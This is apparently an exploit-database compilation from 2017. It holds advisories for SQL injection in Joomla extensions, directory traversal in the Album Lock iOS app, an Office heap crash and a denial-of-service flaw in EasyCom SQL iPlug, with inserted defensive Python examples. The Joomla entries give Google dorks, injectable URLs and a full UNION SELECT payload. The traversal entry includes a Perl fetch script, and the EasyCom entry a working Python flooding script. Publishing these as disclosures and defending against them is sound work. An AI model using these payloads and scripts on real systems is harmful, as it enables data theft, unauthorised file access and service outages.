# # # # #
# Exploit Title: Joomla! Component Team Display v1.2.1 - SQL Injection
# Google Dork: inurl:index.php?option=com_teamdisplay
# Date: 17.02.2017
# Vendor Homepage: http://addonstreet.com/
# Software Buy: https://extensions.joomla.org/extensions/extension/vertical-markets/thematic-directory/team-display/
# Demo: http://addonstreet.com/demo/teamdisplay/
# Version: 1.2.1
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_teamdisplay&view=members&filter_category=[SQL]
# # # # #
# # # # #
# Exploit Title: Joomla! Component Groovy Gallery v1.0.0 - SQL Injection
# Google Dork: inurl:index.php?option=com_groovygallery
# Date: 17.02.2017
# Vendor Homepage: http://addonstreet.com/
# Software Buy: https://extensions.joomla.org/extensions/extension/photos-a-images/galleries/groovy-gallery/
# Demo: http://addonstreet.com/products/groovy-gallery
# Version: 1.0.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_groovygallery&view=images&filter_category=[SQL]
# http://localhost/[PATH]/index.php?option=com_groovygallery&view=images&groovy_category=[SQL]
# # # # #
# # # # #
# Exploit Title: Joomla! Component WMT Content Timeline v1.0 - SQL Injection
# Google Dork: inurl:index.php?option=com_wmt_content_timeline
# Date: 17.02.2017
# Vendor Homepage: http://devecostudio.com
# Software Buy: https://extensions.joomla.org/extensions/extension/news-display/articles-display/wmt-content-timeline/
# Demo: http://joomla.devecostudio.com/9-wmt-content-timeline-joomla-module.html
# Version: 1.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_wmt_content_timeline&task=returnArticle&id=[SQL]
# -66666+/*!50000union*/+select+1,2,3,4,5,6,7,8,9,10,0x496873616e2053656e63616e203c62723e207777772e696873616e2e6e6574,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),13,14,15--+-
# # # # #
# # # # #
# Exploit Title: Joomla! Component Joomloc-CAT v4.1.3 - SQL Injection
# Google Dork: inurl:index.php?option=com_joomloc
# Date: 18.02.2017
# Vendor Homepage: http://www.joomloc.fr.nf/
# Software Buy: https://extensions.joomla.org/extensions/extension/vertical-markets/booking-a-reservations/joomloc-cat/
# Demo: http://www.joomloc.fr.nf/joomlocprocmpms/
# Version: 4.1.3
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_joomloc&view=engine&layout=geo&liste=65&place=dep&ville=[SQL]
# # # # #
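Every entry above has the same shape: a GET parameter (`filter_category`, `groovy_category`, `id`, `ville`) that reaches a database query without sanitisation, and the WMT Content Timeline payload shows what such a request looks like on the wire (a MySQL version-comment `/*!50000union*/`, a `UNION SELECT`, `information_schema`). As an added defender-side example that is not part of these advisories, the following Python screens web-server access-log lines for those constructs after URL-decoding the query string, so that percent-encoded variants are caught as well. The log lines are constructed for the example (they are not real traffic), and the indicator regexes are my own assumptions about what is worth flagging, not a list from the advisories.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote_plus

# Constructed access-log lines in common log format (not real traffic). The first and
# last are benign; the middle two carry the kinds of payload seen in the advisories.
SAMPLE_LOG = [
    '10.0.0.5 - - [17/Feb/2017:10:00:01 +0000] "GET /index.php?option=com_teamdisplay&view=members&filter_category=3 HTTP/1.1" 200 5120',
    '10.0.0.9 - - [17/Feb/2017:10:00:07 +0000] "GET /index.php?option=com_wmt_content_timeline&task=returnArticle&id=-66666+/*!50000union*/+select+1,2,3 HTTP/1.1" 200 812',
    '10.0.0.9 - - [17/Feb/2017:10:00:09 +0000] "GET /index.php?option=com_groovygallery&view=images&groovy_category=1%27%20AND%20extractvalue(1,concat(0x3a,version()))--%20- HTTP/1.1" 500 301',
    '10.0.0.7 - - [17/Feb/2017:10:00:12 +0000] "GET /index.php?option=com_joomloc&view=engine&ville=Paris HTTP/1.1" 200 9021',
]

# Pulls method and request target out of the quoted request line.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Indicators (assumed, not from the advisories): MySQL version comments, UNION ... SELECT,
# information_schema access, XPath error-based extraction, trailing comment terminators,
# and a closing quote followed by a boolean operator.
SQLI_PATTERNS = [
    ("mysql_version_comment", re.compile(r"/\*!\d*\s*\w+", re.I)),
    ("union_select", re.compile(r"union[\s\S]{0,40}?select", re.I)),
    ("information_schema", re.compile(r"\binformation_schema\b", re.I)),
    ("error_based_xpath", re.compile(r"\b(extractvalue|updatexml)\s*\(", re.I)),
    ("comment_terminator", re.compile(r"(--\s|#|/\*)\s*$")),
    ("quote_then_boolean", re.compile(r"['\"]\s*(and|or)\s+", re.I)),
]


def decode_params(target):
    """Split a request target into (path, [(name, value), ...]).

    parse_qsl already percent-decodes once; the extra unquote_plus catches
    double-encoded values (assumption: the application may decode again).
    """
    parts = urlsplit(target)
    params = [(name, unquote_plus(value))
              for name, value in parse_qsl(parts.query, keep_blank_values=True)]
    return parts.path, params


def scan_params(params):
    """Return [(param_name, indicator_label), ...] for every indicator that fires."""
    hits = []
    for name, value in params:
        for label, rx in SQLI_PATTERNS:
            if rx.search(value):
                hits.append((name, label))
    return hits


def screen_log(lines):
    """Return one finding per log line whose query string carries SQLi indicators."""
    findings = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        _path, params = decode_params(m.group("target"))
        hits = scan_params(params)
        if hits:
            findings.append({
                "client": line.split()[0],
                "component": dict(params).get("option", "?"),
                "hits": hits,
            })
    return findings


if __name__ == "__main__":
    for f in screen_log(SAMPLE_LOG):
        print(f["client"], f["component"], f["hits"])
```

The `option=` value is kept in each finding because it names the Joomla component involved, which is what a defender needs in order to map a hit back to one of the advisories above and decide whether the extension is installed.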
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=949
Platform: Microsoft Office 2010 on Windows 7 x86
Class: heap memory corruption
The following crash was observed in Microsoft Office 2010 running under Windows 7 x86 with Application Verifier enabled. This crash appeared to be non-deterministic, depending on memory layout, and will not reproduce in all instances, but it demonstrated a high degree of reliability.
Attached files:
2581805226.ppt: fuzzed crashing file
File versions:
mso.dll: 14.0.7173.5000
gfx.dll: 14.0.7104.5000
oart.dll: 14.0.7169.5000
riched20.dll: 14.0.7155.5000
msptls.dll: 14.0.7164.5000
(7ac.a64): Access violation - code c0000005 (first chance)
eax=200bcf3a ebx=1febce30 ecx=1febce2c edx=77cf6b01 esi=1febce34 edi=1febce18
eip=66a19941 esp=0027008c ebp=002700d8 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
mso!Ordinal5429+0x376:
66a19941 0fb708 movzx ecx,word ptr [eax] ds:0023:200bcf3a=????
66a1993c 8b4104 mov eax,dword ptr [ecx+4] ; Length 0x00200122
66a1993f 03c7 add eax,edi
=> 66a19941 0fb708 movzx ecx,word ptr [eax] ds:0023:200bcf3a=????
66a19944 894dfc mov dword ptr [ebp-4],ecx
66a19947 8a55fd mov dl,byte ptr [ebp-3]
66a1994a 8855fc mov byte ptr [ebp-4],dl
66a1994d 884dfd mov byte ptr [ebp-3],cl
66a19950 66837dfc04 cmp word ptr [ebp-4],4
66a19955 0f85e0010000 jne mso!Ordinal5429+0x570 (66a19b3b)
66a1995b 8a08 mov cl,byte ptr [eax]
66a1995d 8a5001 mov dl,byte ptr [eax+1]
66a19960 8810 mov byte ptr [eax],dl
66a19962 884801 mov byte ptr [eax+1],cl
0:000> kb
ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
002700d8 66a19527 20099000 0000c000 2e010b53 mso!Ordinal5429+0x376
002701ac 66a19348 1febefa0 042109c7 042109c7 mso!Ordinal10199+0x2138
002701c8 66a192a9 00270240 042109c7 00000001 mso!Ordinal10199+0x1f59
00270288 66a18c32 042109c7 0027038c 00000004 mso!Ordinal10199+0x1eba
00270474 66a18bb5 042109c7 1feeaff8 00000002 mso!Ordinal10199+0x1843
00270498 6b256c34 042109c7 1feeaff8 00000002 mso!Ordinal10199+0x17c6
002704bc 6b2570e0 042109c7 1feeaff8 00000002 gfx!Ordinal980+0xa2
00270570 6b256bd4 0b558dc8 1feeaff8 00000002 gfx!Ordinal818+0x306
002705bc 67821180 002705fc 1feeaff8 00000002 gfx!Ordinal980+0x42
0027061c 67820b5a 00000002 1ba92e18 1feeaff8 oart!Ordinal2842+0xb6c
00270690 6781fed8 00000000 001f2ff0 00270924 oart!Ordinal2842+0x546
002706e0 61c2000c 00270724 00000000 00000000 oart!Ordinal7653+0x7d3
00270878 61c1f736 002708a8 00000000 00000064 riched20!RichListBoxWndProc+0x50da
002708b0 61c1edb1 00000000 0000ffff 00000000 riched20!RichListBoxWndProc+0x4804
002709a0 61c1e7ba 00000000 00000001 00000000 riched20!RichListBoxWndProc+0x3e7f
002709d4 6aa75d8c 0a7c1c38 00000000 00000000 riched20!RichListBoxWndProc+0x3888
00270a54 6aa6ef12 1f9b4ef8 00000000 00270c2c MSPTLS!LssbFIsSublineEmpty+0x16269
00270c5c 6aa54c98 0a7c3a78 00000000 00004524 MSPTLS!LssbFIsSublineEmpty+0xf3ef
00270c90 61c1c803 0a7c3a78 00000000 00004524 MSPTLS!LsCreateLine+0x23
00270db0 61c1c659 00000003 00000000 ffffffff riched20!RichListBoxWndProc+0x18d1
00270e08 61c0f36a 00271770 00000003 00000000 riched20!RichListBoxWndProc+0x1727
In this crash eax is pointing to an invalid memory region and is being dereferenced, causing an access violation. There is a clear path to an out-of-bounds memory write shortly after the current crashing instruction. The value in eax came from edi + [ecx+4]. The value in [ecx+4] appears to be a length with a single bit flipped, 0x00200122 instead of 0x00000122. The heap chunk allocated for this came from:
0:000> !heap -p -a 0x1febce18
address 1febce18 found in
_DPH_HEAP_ROOT @ 71000
in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)
1feb171c: 1febce18 1e2 - 1febc000 2000
6eac8e89 verifier!AVrfDebugPageHeapAllocate+0x00000229
77d7616e ntdll!RtlDebugAllocateHeap+0x00000030
77d3a08b ntdll!RtlpAllocateHeap+0x000000c4
77d05920 ntdll!RtlAllocateHeap+0x0000023a
6fcdad1a vrfcore!VerifierSetAPIClassName+0x000000aa
6fc816ac vfbasics+0x000116ac
67080c59 mso!Ordinal9770+0x000078e2
66a19527 mso!Ordinal10199+0x00002138
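The analysis above comes down to one missing check: a length field read from the file (0x00200122, one bit away from the intended 0x00000122) is added to a base pointer and dereferenced without being compared against the 0x1e2-byte allocation that holds it. As an added example that is not part of the Project Zero report, the following Python models the defensive version of that step for a simple constructed record format (`<u16 type><u32 length><payload>`): the length is validated against the bytes remaining in the allocation before any offset is computed from it. The record layout, the record types and the buffer contents are constructed for the example; only the chunk size and the two length values are taken from the report.

```python
import struct

CHUNK_SIZE = 0x1e2            # UserSize of the heap block in the report
GOOD_LENGTH = 0x00000122      # length the report says was intended
FLIPPED_LENGTH = 0x00200122   # the same value with one extra bit set


class RecordError(ValueError):
    """Raised when a record header would carry the cursor outside the allocation."""


def bits_differing(a, b):
    """Number of bit positions in which a and b differ (1 for the report's pair)."""
    return bin(a ^ b).count("1")


def parse_records(buf):
    """Walk constructed records <u16 type><u32 length><payload> inside buf.

    Returns [(type, length), ...]. Every length is checked against the bytes
    remaining in buf BEFORE it is used to advance the cursor, which is the
    check the crashing code above lacks (there, base + length is dereferenced
    directly).
    """
    out = []
    off = 0
    while off < len(buf):
        if len(buf) - off < 6:
            raise RecordError(f"truncated header at offset {off:#x}")
        rtype, rlen = struct.unpack_from("<HI", buf, off)
        off += 6
        remaining = len(buf) - off
        if rlen > remaining:
            raise RecordError(
                f"record at {off - 6:#x} declares {rlen:#x} payload bytes, "
                f"only {remaining:#x} remain in a {len(buf):#x}-byte allocation")
        out.append((rtype, rlen))
        off += rlen
    return out


def build_chunk(declared_length):
    """Construct a CHUNK_SIZE-byte allocation holding two records.

    Record A has 0x122 real payload bytes but its header declares
    `declared_length`; record B (type 2) fills the remainder. Passing
    GOOD_LENGTH gives a consistent chunk, FLIPPED_LENGTH gives the report's
    corrupted one.
    """
    rec_a = struct.pack("<HI", 4, declared_length) + b"A" * GOOD_LENGTH
    rest = CHUNK_SIZE - len(rec_a) - 6
    rec_b = struct.pack("<HI", 2, rest) + b"B" * rest
    buf = rec_a + rec_b
    assert len(buf) == CHUNK_SIZE
    return buf


if __name__ == "__main__":
    print(parse_records(build_chunk(GOOD_LENGTH)))
    try:
        parse_records(build_chunk(FLIPPED_LENGTH))
    except RecordError as e:
        print("rejected:", e)
```

With the intended length the walker reports two records; with the flipped length it refuses the first record instead of computing an offset 0x200000 bytes past the allocation, which is exactly the pointer the crash dump shows being read and then written through.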
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41417.zip
Document Title:
===============
Album Lock v4.0 iOS - Directory Traversal Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2033
Release Date:
=============
2017-02-20
Vulnerability Laboratory ID (VL-ID):
====================================
2033
Common Vulnerability Scoring System:
====================================
7.2
Product & Service Introduction:
===============================
Do you have any secret photos and videos on your iPhone? Album Lock can protect your privacy perfectly. Album is the most
convenient private Photo&Video App! You can add your SPECIAL photos&videos into AlbumLock; we provide many convenient ways:
from the Photo App (Camera Roll), iTunes File Sharing Sync, WiFi Transfer and the in-App Camera.
(Copy of the Homepage: https://itunes.apple.com/us/app/album-lock-lock-secret-photo/id851608952 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory core research team discovered a directory traversal web vulnerability in the official Album Lock v4.0 iOS mobile application.
Vulnerability Disclosure Timeline:
==================================
2017-02-20: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
A directory traversal web vulnerability has been discovered in the official Album Lock v4.0 iOS mobile web-application.
The issue allows attackers to request and download local application files without authorization by manipulating path parameters.
The directory traversal web vulnerability is located in the `filePaht` parameter of the wifi web-server interface. Remote attackers
are able to request the local web-server during the sharing process to access application files without authentication. Attackers are able
to request files via the `getObject` image path variables to access or download them. Remote attackers are able to access the root `document`
path of the application. The request method to execute is GET and the attack vector is located on the client-side of the web-server
web-application. Finally, an attacker is able to access the service with the credentials by using a client via the http protocol.
The security risk of the directory traversal vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 7.2.
Exploitation of the web vulnerability requires no privileged web-application user account or user interaction. Successful exploitation of the
vulnerability results in information leaking and mobile application compromise through unauthorized and unauthenticated access.
Request Method(s):
[+] GET
Vulnerable Module(s):
[+] getObject
Vulnerable Parameter(s):
[+] filePaht
Affected Module(s):
[+] Web-Server File System
Proof of Concept (PoC):
=======================
The security vulnerability can be exploited by remote attackers without user interaction or a privileged web-application user account.
For a security demonstration, or to reproduce the vulnerability, follow the provided information and steps below.
Standard Request:
http://localhost:8880/getImage?filePaht=/var/mobile/Containers/Data/Application/FD29A0B7-9931-4A7F-A9AA-3942B539DC8C/Documents/._alias_images/fhhjjj/picture-00001.png
PoC: Payload
/var/mobile/Containers/Data/Application/FD29A0B7-9931-4A7F-A9AA-3942B539DC8C./../../../Application
Malicious Request: Exploitation
http://localhost:8880/getImage?filePaht=/var/mobile/Containers/Data/Application/FD29A0B7-9931-4A7F-A9AA-3942B539DC8C/Documents/
http://localhost:8880/getImage?filePaht=/var/mobile/Containers/Data/Application/
http://localhost:8880/getImage?filePaht=/var/mobile/
PoC: Exploit
use strict;
use LWP::UserAgent;
my $b = LWP::UserAgent->new();
my $host = "1.1.1.1:5555";
print $b->get("http://".$host."/getImage?filePaht=/var/mobile/Containers/Data/Application/FD29A0B7-9931-4A7F-A9AA-3942B539DC8C/config.dat")->content;
--- PoC Session Logs [GET] ---
Status: 200[OK]
GET http://localhost:8880/getImage?filePaht=/var/mobile/Containers/Data/Application/FD29A0B7-9931-4A7F-A9AA-3942B539DC8C./../../../Application
Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:8880]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0]
Accept[*/*]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Referer[http://localhost:8880/list_gif.html?folder=/var/mobile/Containers/Data/Application/FD29A0B7-9931-4A7F-A9AA-3942B539DC8C/]
Connection[keep-alive]
Response Header:
Accept-Ranges[bytes]
Reference(s):
http://localhost:8880/
http://localhost:8880/getImage
http://localhost:8880/getImage?filePaht=
http://localhost:8880/list_gif.html
http://localhost:8880/list_gif.html?folder=
Solution - Fix & Patch:
=======================
The vulnerability can be patched by disallowing the `filePaht` parameter to request upper local paths outside the document folder.
Include a whitelist of allowed request paths and set up a secure exception handler to prevent exploitation.
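The fix described above has two parts: canonicalise the requested path and refuse anything that does not stay under the Documents folder, and additionally restrict what may be served to a known set. As an added example that is not part of the advisory or of the Album Lock application (whose server-side code is not shown here), the following Python implements that check and runs it against the advisory's own standard and malicious requests. The container path is the one from the advisory; the allowlist of media suffixes is my assumption about what a photo/video gallery needs to serve.

```python
import posixpath
from typing import Optional
from urllib.parse import unquote

# Container path from the advisory's requests; the Documents folder is the only
# directory the WiFi sharing server should ever read from.
DOCUMENTS_ROOT = ("/var/mobile/Containers/Data/Application/"
                  "FD29A0B7-9931-4A7F-A9AA-3942B539DC8C/Documents")

# Constructed allowlist (assumption, not from the advisory): the gallery serves
# images and videos, so nothing else (config.dat, plists, databases) is reachable.
ALLOWED_SUFFIXES = {".png", ".jpg", ".jpeg", ".gif", ".mov", ".mp4"}


def safe_file_path(requested: str, root: str = DOCUMENTS_ROOT) -> Optional[str]:
    """Return the canonical path to serve, or None if the request must be refused.

    - percent-decodes once, so %2e%2e is seen as ..
    - rejects NUL bytes, which truncate paths in C-based file APIs
    - resolves ./ and ../ segments lexically (posixpath.normpath), then requires
      the result to be strictly inside root; requesting root itself (a directory
      listing) is refused too
    - requires an allowlisted suffix

    posixpath is used so the example runs offline on any platform; a real server
    would use os.path.realpath on the live filesystem as well, so that symlinks
    inside Documents cannot point back out of it.
    """
    decoded = unquote(requested)
    if "\x00" in decoded:
        return None
    # Relative requests are interpreted under root; absolute ones must already be under it.
    candidate = decoded if decoded.startswith("/") else posixpath.join(root, decoded)
    canon = posixpath.normpath(candidate)
    root_canon = posixpath.normpath(root)
    if not canon.startswith(root_canon + "/"):
        return None
    if posixpath.splitext(canon)[1].lower() not in ALLOWED_SUFFIXES:
        return None
    return canon


if __name__ == "__main__":
    # The advisory's standard request and its three malicious ones.
    for req in [
        DOCUMENTS_ROOT + "/._alias_images/fhhjjj/picture-00001.png",
        "/var/mobile/Containers/Data/Application/FD29A0B7-9931-4A7F-A9AA-3942B539DC8C./../../../Application",
        DOCUMENTS_ROOT + "/",
        "/var/mobile/Containers/Data/Application/",
        "/var/mobile/",
    ]:
        print("ALLOW" if safe_file_path(req) else "DENY ", req)
```

Note the trailing-dot trick in the advisory's payload (`...DC8C./../../../Application`): it is just a directory name ending in a dot, so normalisation treats it like any other segment and the three `..` still climb out of the container, which is why a prefix comparison on the canonical path, not on the raw string, is the check that matters.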
Security Risk:
==============
The security risk of the directory traversal web vulnerability in the mobile application is estimated as high. (CVSS 7.2)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (http://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.)
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Section: magazine.vulnerability-lab.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php
Any modified copy or reproduction, including partial usage, of this file, resources or information requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark
of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to ask for permission.
Copyright © 2017 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
# # # # #
# Exploit Title: Joomla! Component MediaLibrary Basic v3.5 - SQL Injection
# Google Dork: inurl:index.php?option=com_booklibrary
# Date: 22.02.2017
# Vendor Homepage: http://ordasoft.com/
# Software Buy: https://extensions.joomla.org/extensions/extension/living/education-a-culture/medialibrary-basic/
# Demo: http://ordasvit.com/joomla-media-library/
# Version: 3.5
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php/medialibrary/media/all-books/all-books/345/view/book/19[SQL]/Ihsan_Sencan
# http://localhost/[PATH]/index.php/medialibrary/media/all-books/all-books/345/lend_request?mid[0]=[SQL]
# # # # #
# # # # #
# Exploit Title: Joomla! Component BookLibrary v3.6.1 - SQL Injection
# Google Dork: inurl:index.php?option=com_booklibrary
# Date: 22.02.2017
# Vendor Homepage: http://ordasoft.com/
# Software Buy: https://extensions.joomla.org/extensions/extension/living/education-a-culture/booklibrary-basic/
# Demo: http://ordasvit.com/joomla-book-library
# Version: 3.6.1
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_booklibrary&task=suggestion&comment=[SQL]
# http://localhost/[PATH]/index.php/component/booklibrary/0/search?searchtext=[SQL]&author=on&title=on&isbn=on'&bookid=on&description=on&publisher=on&pricefrom=19&priceto=287.9&catid=0&option=com_booklibrary&task=search&Itemid=207
# # # # #
# # # # #
# Exploit Title: Joomla! Component RealEstateManager v3.9 - SQL Injection
# Google Dork: inurl:index.php?option=com_realestatemanager
# Date: 22.02.2017
# Vendor Homepage: http://ordasoft.com/
# Software Buy: https://extensions.joomla.org/extensions/extension/vertical-markets/real-estate/realestatemanager-basic/
# Demo: http://ordasvit.com/joomla-real-estate-manager/
# Version: 3.9
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php/realestate/all-houses/all-houses-default/160/search?searchtext=a&catid=all&search_date_from=2017-02-21&search_date_until=2017-02-28&pricefrom2=114019&priceto2=750000&listing_type=all&listing_status=[SQL]
# http://localhost/[PATH]/index.php/realestate/all-houses/all-houses-default/160/search?searchtext=a&catid=all&search_date_from=2017-02-21&search_date_until=2017-02-28&pricefrom2=114019&priceto2=750000&listing_type=[SQL]
# # # # #
# # # # #
# Exploit Title: Joomla! Component VehicleManager v3.9 - SQL Injection
# Google Dork: inurl:index.php?option=com_vehiclemanager
# Date: 22.02.2017
# Vendor Homepage: http://ordasoft.com/
# Software Buy: https://extensions.joomla.org/extensions/extension/vertical-markets/vehicles/vehiclemanager-basic/
# Demo: http://ordasvit.com/joomla-vehicle-manager/
# Version: 3.9
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_vehiclemanager&Itemid=70&task=search&submit=Search&catid=0&maker=&fuel_type=all&model=all&listing_type=all&transmission=all&vcondition=[SQL]
# http://localhost/[PATH]/index.php?option=com_vehiclemanager&Itemid=70&task=search&submit=Search&catid=0&maker=&fuel_type=all&model=all&listing_type=all&transmission=[SQL]
# http://localhost/[PATH]/index.php?option=com_vehiclemanager&Itemid=70&task=search&submit=Search&catid=0&maker=&fuel_type=all&model=all&listing_type=[SQL]
# http://localhost/[PATH]/index.php?option=com_vehiclemanager&Itemid=70&task=search&submit=Search&catid=0&maker=&fuel_type=all&model=[SQL]
# http://localhost/[PATH]/index.php?option=com_vehiclemanager&Itemid=70&task=search&submit=Search&catid=0&maker=&fuel_type=[SQL]
# http://localhost/[PATH]/index.php?option=com_vehiclemanager&Itemid=70&task=search&submit=Search&catid=0&maker=[SQL]
# # # # #
# # # # #
# Exploit Title: Joomla! Component ContentMap v1.3.8 - SQL Injection
# Google Dork: inurl:index.php?option=com_contentmap
# Date: 22.02.2017
# Vendor Homepage: https://www.turismo.eu/
# Software Buy: https://extensions.joomla.org/extensions/extension/maps-a-weather/geotagging/contentmap/
# Demo: https://www.turismo.eu/itinerari.html
# Version: 1.3.8
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_contentmap&owner=plugin&view=smartloader&id=10135&Itemid=606&type=json&filename=articlesmarkers&source=article&contentid=[SQL]
# # # # #
[+] Credits: John Page AKA Hyp3rlinX
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/EASYCOM-SQL-IPLUG-DENIAL-OF-SERVICE.txt
[+] ISR: ApparitionSec
Vendor:
================
easycom-aura.com
Product:
===========
SQL iPlug
EasycomPHP_4.0029.iC8im2.exe
SQL iPlug provides System i applications real-time access to heterogeneous and external databases
(Oracle, SQL Server, MySQL, MS Access, Sybase, Progress) in a completely transparent manner and without requiring replication.
Vulnerability Type:
===================
Denial Of Service
CVE Reference:
==============
CVE-2017-5359
Security Issue:
================
SQL iPlug listens on port 7078 by default. It suffers from a denial of service when an overly long string is sent via
HTTP requests to the "D$EVAL" parameter.
Exploit/POC:
============
import socket
print 'EasyCom SQL-IPLUG DOS 0day!'
print 'hyp3rlinx'
IP = raw_input("[IP]> ")
PORT = 7078
payload="A"*43000
arr=[]
c=0
while 1:
    try:
        arr.append(socket.create_connection((IP,PORT)))
        arr[c].send('GET /?D$EVAL='+payload+" HTTP/1.1\r\n\r\n")
        c+=1
        print "doit!"
    except socket.error:
        print "[*] 5th ave 12:00"
        raw_input()
        break
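The issue above is a missing input limit: the service parses whatever length of value arrives in `D$EVAL`. As an added example that is not part of the advisory or of the EasyCom product, the following Python shows the two-stage limit a front-end proxy or the listener itself would apply: cap the size of the raw request line before parsing anything, then cap each parameter value individually. The limits (8192 bytes for the line, 1024 for `D$EVAL`, 2048 for anything else) are constructed for the example; the request shape is the one the PoC sends.

```python
from urllib.parse import urlsplit, parse_qsl

MAX_REQUEST_LINE = 8192          # hard cap checked before any parsing work is done
# Constructed per-parameter limits (assumption: D$EVAL carries a short expression,
# so anything longer than this is not a legitimate request).
PARAM_LIMITS = {"D$EVAL": 1024}
DEFAULT_PARAM_LIMIT = 2048


def validate_request_line(raw: bytes):
    """Return (ok, reason) for the first line of an HTTP request.

    Stage 1 rejects on raw size alone, so an oversized request is dropped without
    parsing it. Stage 2 parses the query string and applies per-parameter limits.
    """
    if len(raw) > MAX_REQUEST_LINE:
        return False, f"request line {len(raw)} bytes exceeds {MAX_REQUEST_LINE}"
    try:
        line = raw.split(b"\r\n", 1)[0].decode("ascii")
        method, target, version = line.split(" ")
    except (UnicodeDecodeError, ValueError):
        return False, "malformed request line"
    if not version.startswith("HTTP/"):
        return False, "malformed request line"
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        limit = PARAM_LIMITS.get(name, DEFAULT_PARAM_LIMIT)
        if len(value) > limit:
            return False, f"parameter {name} is {len(value)} bytes, limit {limit}"
    return True, "ok"


def build_request(value: str) -> bytes:
    """Construct a request of the shape the PoC sends: GET /?D$EVAL=<value> HTTP/1.1."""
    return f"GET /?D$EVAL={value} HTTP/1.1\r\n\r\n".encode()


if __name__ == "__main__":
    for n in (100, 1500, 43000):
        print(n, validate_request_line(build_request("A" * n)))
```

The 43000-byte value from the PoC never reaches the parser at all; a 1500-byte value passes the line cap but fails the per-parameter limit, and a 100-byte value is accepted.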
Disclosure Timeline:
======================================
Vendor Notification: December 22, 2016
Vendor acknowledgement: December 23, 2016
Vendor Release Fix/Version February 20, 2017
